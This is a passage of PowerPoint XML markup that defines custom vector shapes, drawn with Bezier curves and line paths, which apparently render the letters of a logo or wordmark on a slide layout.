                    <a:cubicBezTo>
                      <a:pt x="2" y="17"/>
                      <a:pt x="4" y="19"/>
                      <a:pt x="5" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="19"/>
                      <a:pt x="7" y="18"/>
                      <a:pt x="7" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="18"/>
                      <a:pt x="8" y="17"/>
                      <a:pt x="9" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="16"/>
                      <a:pt x="9" y="16"/>
                      <a:pt x="9" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="15"/>
                      <a:pt x="9" y="14"/>
                      <a:pt x="8" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="12"/>
                      <a:pt x="7" y="11"/>
                      <a:pt x="5" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="9"/>
                      <a:pt x="2" y="8"/>
                      <a:pt x="2" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="7"/>
                      <a:pt x="1" y="6"/>
                      <a:pt x="1" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="4"/>
                      <a:pt x="1" y="3"/>
                      <a:pt x="1" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="1"/>
                      <a:pt x="2" y="1"/>
                      <a:pt x="3" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="6" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="7" y="0"/>
                      <a:pt x="8" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="1"/>
                      <a:pt x="10" y="2"/>
                      <a:pt x="11" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="4"/>
                      <a:pt x="9" y="4"/>
                      <a:pt x="9" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="3"/>
                      <a:pt x="8" y="3"/>
                      <a:pt x="7" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="2"/>
                      <a:pt x="6" y="2"/>
                      <a:pt x="6" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="2"/>
                      <a:pt x="4" y="2"/>
                      <a:pt x="4" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="3"/>
                      <a:pt x="3" y="4"/>
                      <a:pt x="3" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="5"/>
                      <a:pt x="3" y="5"/>
                      <a:pt x="3" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="6"/>
                      <a:pt x="4" y="6"/>
                      <a:pt x="4" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="7"/>
                      <a:pt x="5" y="8"/>
                      <a:pt x="7" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="10"/>
                      <a:pt x="10" y="11"/>
                      <a:pt x="10" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="13"/>
                      <a:pt x="11" y="14"/>
                      <a:pt x="11" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="17"/>
                      <a:pt x="11" y="18"/>
                      <a:pt x="9" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="20"/>
                      <a:pt x="7" y="20"/>
                      <a:pt x="6" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="20"/>
                      <a:pt x="3" y="20"/>
                      <a:pt x="2" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="19"/>
                      <a:pt x="0" y="18"/>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38"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5672138" y="1185863"/>
                <a:ext cx="22225" cy="41275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 14"/>
                  <a:gd name="T1" fmla="*/ 2 h 26"/>
                  <a:gd name="T2" fmla="*/ 0 w 14"/>
                  <a:gd name="T3" fmla="*/ 0 h 26"/>
                  <a:gd name="T4" fmla="*/ 14 w 14"/>
                  <a:gd name="T5" fmla="*/ 0 h 26"/>
                  <a:gd name="T6" fmla="*/ 14 w 14"/>
                  <a:gd name="T7" fmla="*/ 2 h 26"/>
                  <a:gd name="T8" fmla="*/ 9 w 14"/>
                  <a:gd name="T9" fmla="*/ 2 h 26"/>
                  <a:gd name="T10" fmla="*/ 9 w 14"/>
                  <a:gd name="T11" fmla="*/ 26 h 26"/>
                  <a:gd name="T12" fmla="*/ 6 w 14"/>
                  <a:gd name="T13" fmla="*/ 26 h 26"/>
                  <a:gd name="T14" fmla="*/ 6 w 14"/>
                  <a:gd name="T15" fmla="*/ 2 h 26"/>
                  <a:gd name="T16" fmla="*/ 0 w 14"/>
                  <a:gd name="T17"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6">
                    <a:moveTo>
                      <a:pt x="0" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6"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39"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5700713" y="1185863"/>
                <a:ext cx="22225" cy="41275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 14"/>
                  <a:gd name="T1" fmla="*/ 0 h 26"/>
                  <a:gd name="T2" fmla="*/ 14 w 14"/>
                  <a:gd name="T3" fmla="*/ 0 h 26"/>
                  <a:gd name="T4" fmla="*/ 14 w 14"/>
                  <a:gd name="T5" fmla="*/ 2 h 26"/>
                  <a:gd name="T6" fmla="*/ 2 w 14"/>
                  <a:gd name="T7" fmla="*/ 2 h 26"/>
                  <a:gd name="T8" fmla="*/ 2 w 14"/>
                  <a:gd name="T9" fmla="*/ 10 h 26"/>
                  <a:gd name="T10" fmla="*/ 14 w 14"/>
                  <a:gd name="T11" fmla="*/ 10 h 26"/>
                  <a:gd name="T12" fmla="*/ 14 w 14"/>
                  <a:gd name="T13" fmla="*/ 13 h 26"/>
                  <a:gd name="T14" fmla="*/ 2 w 14"/>
                  <a:gd name="T15" fmla="*/ 13 h 26"/>
                  <a:gd name="T16" fmla="*/ 2 w 14"/>
                  <a:gd name="T17" fmla="*/ 23 h 26"/>
                  <a:gd name="T18" fmla="*/ 14 w 14"/>
                  <a:gd name="T19" fmla="*/ 23 h 26"/>
                  <a:gd name="T20" fmla="*/ 14 w 14"/>
                  <a:gd name="T21" fmla="*/ 26 h 26"/>
                  <a:gd name="T22" fmla="*/ 0 w 14"/>
                  <a:gd name="T23" fmla="*/ 26 h 26"/>
                  <a:gd name="T24" fmla="*/ 0 w 14"/>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6">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2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40"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5729288" y="1185863"/>
                <a:ext cx="44450" cy="41275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 28"/>
                  <a:gd name="T1" fmla="*/ 26 h 26"/>
                  <a:gd name="T2" fmla="*/ 2 w 28"/>
                  <a:gd name="T3" fmla="*/ 0 h 26"/>
                  <a:gd name="T4" fmla="*/ 4 w 28"/>
                  <a:gd name="T5" fmla="*/ 0 h 26"/>
                  <a:gd name="T6" fmla="*/ 14 w 28"/>
                  <a:gd name="T7" fmla="*/ 20 h 26"/>
                  <a:gd name="T8" fmla="*/ 24 w 28"/>
                  <a:gd name="T9" fmla="*/ 0 h 26"/>
                  <a:gd name="T10" fmla="*/ 24 w 28"/>
                  <a:gd name="T11" fmla="*/ 0 h 26"/>
                  <a:gd name="T12" fmla="*/ 28 w 28"/>
                  <a:gd name="T13" fmla="*/ 26 h 26"/>
                  <a:gd name="T14" fmla="*/ 26 w 28"/>
                  <a:gd name="T15" fmla="*/ 26 h 26"/>
                  <a:gd name="T16" fmla="*/ 23 w 28"/>
                  <a:gd name="T17" fmla="*/ 7 h 26"/>
                  <a:gd name="T18" fmla="*/ 14 w 28"/>
                  <a:gd name="T19" fmla="*/ 26 h 26"/>
                  <a:gd name="T20" fmla="*/ 13 w 28"/>
                  <a:gd name="T21" fmla="*/ 26 h 26"/>
                  <a:gd name="T22" fmla="*/ 4 w 28"/>
                  <a:gd name="T23" fmla="*/ 7 h 26"/>
                  <a:gd name="T24" fmla="*/ 1 w 28"/>
                  <a:gd name="T25" fmla="*/ 26 h 26"/>
                  <a:gd name="T26" fmla="*/ 0 w 28"/>
                  <a:gd name="T2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26">
                    <a:moveTo>
                      <a:pt x="0" y="26"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="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41"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5794375" y="1185863"/>
                <a:ext cx="42863" cy="41275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10 w 21"/>
                  <a:gd name="T1" fmla="*/ 0 h 20"/>
                  <a:gd name="T2" fmla="*/ 18 w 21"/>
                  <a:gd name="T3" fmla="*/ 3 h 20"/>
                  <a:gd name="T4" fmla="*/ 21 w 21"/>
                  <a:gd name="T5" fmla="*/ 10 h 20"/>
                  <a:gd name="T6" fmla="*/ 18 w 21"/>
                  <a:gd name="T7" fmla="*/ 17 h 20"/>
                  <a:gd name="T8" fmla="*/ 11 w 21"/>
                  <a:gd name="T9" fmla="*/ 20 h 20"/>
                  <a:gd name="T10" fmla="*/ 3 w 21"/>
                  <a:gd name="T11" fmla="*/ 17 h 20"/>
                  <a:gd name="T12" fmla="*/ 0 w 21"/>
                  <a:gd name="T13" fmla="*/ 10 h 20"/>
                  <a:gd name="T14" fmla="*/ 2 w 21"/>
                  <a:gd name="T15" fmla="*/ 5 h 20"/>
                  <a:gd name="T16" fmla="*/ 5 w 21"/>
                  <a:gd name="T17" fmla="*/ 1 h 20"/>
                  <a:gd name="T18" fmla="*/ 10 w 21"/>
                  <a:gd name="T19" fmla="*/ 0 h 20"/>
                  <a:gd name="T20" fmla="*/ 11 w 21"/>
                  <a:gd name="T21" fmla="*/ 2 h 20"/>
                  <a:gd name="T22" fmla="*/ 6 w 21"/>
                  <a:gd name="T23" fmla="*/ 3 h 20"/>
                  <a:gd name="T24" fmla="*/ 3 w 21"/>
                  <a:gd name="T25" fmla="*/ 6 h 20"/>
                  <a:gd name="T26" fmla="*/ 2 w 21"/>
                  <a:gd name="T27" fmla="*/ 10 h 20"/>
                  <a:gd name="T28" fmla="*/ 5 w 21"/>
                  <a:gd name="T29" fmla="*/ 16 h 20"/>
                  <a:gd name="T30" fmla="*/ 11 w 21"/>
                  <a:gd name="T31" fmla="*/ 19 h 20"/>
                  <a:gd name="T32" fmla="*/ 15 w 21"/>
                  <a:gd name="T33" fmla="*/ 17 h 20"/>
                  <a:gd name="T34" fmla="*/ 18 w 21"/>
                  <a:gd name="T35" fmla="*/ 14 h 20"/>
                  <a:gd name="T36" fmla="*/ 19 w 21"/>
                  <a:gd name="T37" fmla="*/ 10 h 20"/>
                  <a:gd name="T38" fmla="*/ 18 w 21"/>
                  <a:gd name="T39" fmla="*/ 6 h 20"/>
                  <a:gd name="T40" fmla="*/ 15 w 21"/>
                  <a:gd name="T41" fmla="*/ 3 h 20"/>
                  <a:gd name="T42" fmla="*/ 11 w 21"/>
                  <a:gd name="T43"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20">
                    <a:moveTo>
                      <a:pt x="10" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="0"/>
                      <a:pt x="16" y="1"/>
                      <a:pt x="18" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="5"/>
                      <a:pt x="21" y="7"/>
                      <a:pt x="21" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="13"/>
                      <a:pt x="20" y="15"/>
                      <a:pt x="18" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="19"/>
                      <a:pt x="13" y="20"/>
                      <a:pt x="11" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="20"/>
                      <a:pt x="5" y="19"/>
                      <a:pt x="3" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="15"/>
                      <a:pt x="0" y="13"/>
                      <a:pt x="0" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="8"/>
                      <a:pt x="1" y="7"/>
                      <a:pt x="2" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="3"/>
                      <a:pt x="4" y="2"/>
                      <a:pt x="5" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="9" y="0"/>
                      <a:pt x="10" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="11" y="2"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="2"/>
                      <a:pt x="8" y="2"/>
                      <a:pt x="6" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="4"/>
                      <a:pt x="4" y="5"/>
                      <a:pt x="3" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="7"/>
                      <a:pt x="2" y="9"/>
                      <a:pt x="2" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="13"/>
                      <a:pt x="3" y="15"/>
                      <a:pt x="5" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="18"/>
                      <a:pt x="8" y="19"/>
                      <a:pt x="11" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="19"/>
                      <a:pt x="13" y="18"/>
                      <a:pt x="15" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="17"/>
                      <a:pt x="17" y="16"/>
                      <a:pt x="18" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="13"/>
                      <a:pt x="19" y="12"/>
                      <a:pt x="19" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="9"/>
                      <a:pt x="19" y="7"/>
                      <a:pt x="18" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="5"/>
                      <a:pt x="16" y="4"/>
                      <a:pt x="15" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="2"/>
                      <a:pt x="12" y="2"/>
                      <a:pt x="1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42"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5845175" y="1185863"/>
                <a:ext cx="26988" cy="41275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 17"/>
                  <a:gd name="T1" fmla="*/ 0 h 26"/>
                  <a:gd name="T2" fmla="*/ 3 w 17"/>
                  <a:gd name="T3" fmla="*/ 0 h 26"/>
                  <a:gd name="T4" fmla="*/ 3 w 17"/>
                  <a:gd name="T5" fmla="*/ 10 h 26"/>
                  <a:gd name="T6" fmla="*/ 13 w 17"/>
                  <a:gd name="T7" fmla="*/ 0 h 26"/>
                  <a:gd name="T8" fmla="*/ 16 w 17"/>
                  <a:gd name="T9" fmla="*/ 0 h 26"/>
                  <a:gd name="T10" fmla="*/ 4 w 17"/>
                  <a:gd name="T11" fmla="*/ 11 h 26"/>
                  <a:gd name="T12" fmla="*/ 17 w 17"/>
                  <a:gd name="T13" fmla="*/ 26 h 26"/>
                  <a:gd name="T14" fmla="*/ 13 w 17"/>
                  <a:gd name="T15" fmla="*/ 26 h 26"/>
                  <a:gd name="T16" fmla="*/ 3 w 17"/>
                  <a:gd name="T17" fmla="*/ 14 h 26"/>
                  <a:gd name="T18" fmla="*/ 3 w 17"/>
                  <a:gd name="T19" fmla="*/ 26 h 26"/>
                  <a:gd name="T20" fmla="*/ 0 w 17"/>
                  <a:gd name="T21" fmla="*/ 26 h 26"/>
                  <a:gd name="T22" fmla="*/ 0 w 17"/>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6">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2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43"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5372100" y="1263650"/>
                <a:ext cx="47625" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 30"/>
                  <a:gd name="T1" fmla="*/ 24 h 24"/>
                  <a:gd name="T2" fmla="*/ 4 w 30"/>
                  <a:gd name="T3" fmla="*/ 0 h 24"/>
                  <a:gd name="T4" fmla="*/ 6 w 30"/>
                  <a:gd name="T5" fmla="*/ 0 h 24"/>
                  <a:gd name="T6" fmla="*/ 16 w 30"/>
                  <a:gd name="T7" fmla="*/ 21 h 24"/>
                  <a:gd name="T8" fmla="*/ 25 w 30"/>
                  <a:gd name="T9" fmla="*/ 0 h 24"/>
                  <a:gd name="T10" fmla="*/ 26 w 30"/>
                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 30 w 30"/>
                  <a:gd name="T13" fmla="*/ 24 h 24"/>
                  <a:gd name="T14" fmla="*/ 27 w 30"/>
                  <a:gd name="T15" fmla="*/ 24 h 24"/>
                  <a:gd name="T16" fmla="*/ 25 w 30"/>
                  <a:gd name="T17" fmla="*/ 6 h 24"/>
                  <a:gd name="T18" fmla="*/ 16 w 30"/>
                  <a:gd name="T19" fmla="*/ 24 h 24"/>
                  <a:gd name="T20" fmla="*/ 15 w 30"/>
                  <a:gd name="T21" fmla="*/ 24 h 24"/>
                  <a:gd name="T22" fmla="*/ 6 w 30"/>
                  <a:gd name="T23" fmla="*/ 6 h 24"/>
                  <a:gd name="T24" fmla="*/ 3 w 30"/>
                  <a:gd name="T25" fmla="*/ 24 h 24"/>
                  <a:gd name="T26" fmla="*/ 0 w 30"/>
                  <a:gd name="T2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0" y="24"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="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44"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5426075" y="1262063"/>
                <a:ext cx="41275" cy="42863"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10 w 20"/>
                  <a:gd name="T1" fmla="*/ 0 h 21"/>
                  <a:gd name="T2" fmla="*/ 17 w 20"/>
                  <a:gd name="T3" fmla="*/ 3 h 21"/>
                  <a:gd name="T4" fmla="*/ 20 w 20"/>
                  <a:gd name="T5" fmla="*/ 11 h 21"/>
                  <a:gd name="T6" fmla="*/ 17 w 20"/>
                  <a:gd name="T7" fmla="*/ 18 h 21"/>
                  <a:gd name="T8" fmla="*/ 10 w 20"/>
                  <a:gd name="T9" fmla="*/ 21 h 21"/>
                  <a:gd name="T10" fmla="*/ 3 w 20"/>
                  <a:gd name="T11" fmla="*/ 18 h 21"/>
                  <a:gd name="T12" fmla="*/ 0 w 20"/>
                  <a:gd name="T13" fmla="*/ 11 h 21"/>
                  <a:gd name="T14" fmla="*/ 1 w 20"/>
                  <a:gd name="T15" fmla="*/ 5 h 21"/>
                  <a:gd name="T16" fmla="*/ 5 w 20"/>
                  <a:gd name="T17" fmla="*/ 2 h 21"/>
                  <a:gd name="T18" fmla="*/ 10 w 20"/>
                  <a:gd name="T19" fmla="*/ 0 h 21"/>
                  <a:gd name="T20" fmla="*/ 10 w 20"/>
                  <a:gd name="T21" fmla="*/ 2 h 21"/>
                  <a:gd name="T22" fmla="*/ 6 w 20"/>
                  <a:gd name="T23" fmla="*/ 3 h 21"/>
                  <a:gd name="T24" fmla="*/ 3 w 20"/>
                  <a:gd name="T25" fmla="*/ 6 h 21"/>
                  <a:gd name="T26" fmla="*/ 2 w 20"/>
                  <a:gd name="T27" fmla="*/ 11 h 21"/>
                  <a:gd name="T28" fmla="*/ 4 w 20"/>
                  <a:gd name="T29" fmla="*/ 17 h 21"/>
                  <a:gd name="T30" fmla="*/ 10 w 20"/>
                  <a:gd name="T31" fmla="*/ 19 h 21"/>
                  <a:gd name="T32" fmla="*/ 14 w 20"/>
                  <a:gd name="T33" fmla="*/ 18 h 21"/>
                  <a:gd name="T34" fmla="*/ 17 w 20"/>
                  <a:gd name="T35" fmla="*/ 15 h 21"/>
                  <a:gd name="T36" fmla="*/ 18 w 20"/>
                  <a:gd name="T37" fmla="*/ 11 h 21"/>
                  <a:gd name="T38" fmla="*/ 17 w 20"/>
                  <a:gd name="T39" fmla="*/ 6 h 21"/>
                  <a:gd name="T40" fmla="*/ 14 w 20"/>
                  <a:gd name="T41" fmla="*/ 3 h 21"/>
                  <a:gd name="T42" fmla="*/ 10 w 20"/>
                  <a:gd name="T43"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1">
                    <a:moveTo>
                      <a:pt x="10" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="0"/>
                      <a:pt x="15" y="1"/>
                      <a:pt x="17" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="5"/>
                      <a:pt x="20" y="8"/>
                      <a:pt x="20" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="13"/>
                      <a:pt x="19" y="16"/>
                      <a:pt x="17" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="20"/>
                      <a:pt x="13" y="21"/>
                      <a:pt x="10" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="21"/>
                      <a:pt x="5" y="20"/>
                      <a:pt x="3" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="16"/>
                      <a:pt x="0" y="14"/>
                      <a:pt x="0" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="9"/>
                      <a:pt x="0" y="7"/>
                      <a:pt x="1" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="4"/>
                      <a:pt x="3" y="3"/>
                      <a:pt x="5" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="1"/>
                      <a:pt x="8" y="0"/>
                      <a:pt x="10" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10" y="2"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="2"/>
                      <a:pt x="7" y="3"/>
                      <a:pt x="6" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="4"/>
                      <a:pt x="3" y="5"/>
                      <a:pt x="3" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="8"/>
                      <a:pt x="2" y="9"/>
                      <a:pt x="2" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="13"/>
                      <a:pt x="2" y="15"/>
                      <a:pt x="4" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="18"/>
                      <a:pt x="8" y="19"/>
                      <a:pt x="10" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="19"/>
                      <a:pt x="13" y="19"/>
                      <a:pt x="14" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="17"/>
                      <a:pt x="16" y="16"/>
                      <a:pt x="17" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="14"/>
                      <a:pt x="18" y="12"/>
                      <a:pt x="18" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="9"/>
                      <a:pt x="18" y="8"/>
